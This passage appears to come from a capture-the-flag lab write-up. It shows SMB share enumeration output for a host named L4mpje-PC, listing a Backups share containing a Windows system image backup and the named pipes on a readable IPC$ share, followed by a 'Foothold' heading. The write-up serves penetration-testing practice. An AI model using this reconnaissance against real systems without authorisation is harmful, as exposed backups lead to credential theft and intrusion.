        fr--r--r--             7110 Fri Feb 22 12:45:32 2019    cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
        fr--r--r--          2374620 Fri Feb 22 12:45:32 2019    cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
        .\Backups\WindowsImageBackup\L4mpje-PC\Catalog\*
        dr--r--r--                0 Fri Feb 22 12:45:32 2019    .
        dr--r--r--                0 Fri Feb 22 12:45:32 2019    ..
        fr--r--r--             5698 Fri Feb 22 12:45:32 2019    BackupGlobalCatalog
        fr--r--r--             7440 Fri Feb 22 12:45:32 2019    GlobalCatalog
        .\Backups\WindowsImageBackup\L4mpje-PC\SPPMetadataCache\*
        dr--r--r--                0 Fri Feb 22 12:45:32 2019    .
        dr--r--r--                0 Fri Feb 22 12:45:32 2019    ..
        fr--r--r--            57848 Fri Feb 22 12:45:32 2019    {cd113385-65ff-4ea2-8ced-5630f6feca8f}
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        .\IPC$\*
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    InitShutdown
        fr--r--r--                4 Sun Dec 31 23:58:45 1600    lsass
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    ntsvcs
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    scerpc
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-2fc-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    epmapper
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-1e8-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    LSM_API_service
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    eventlog
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-3b8-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    atsvc
        fr--r--r--                4 Sun Dec 31 23:58:45 1600    wkssvc
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-364-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    trkwks
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    spoolss
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-66c-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    W32TIME_ALT
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    openssh-ssh-agent
        fr--r--r--                4 Sun Dec 31 23:58:45 1600    srvsvc
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    vgauth-service
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-5ec-0
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-264-0
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-26c-0

Foothold

  • Let’s check the note.txt

Friday, June 16, 2023 | 4 minutes Read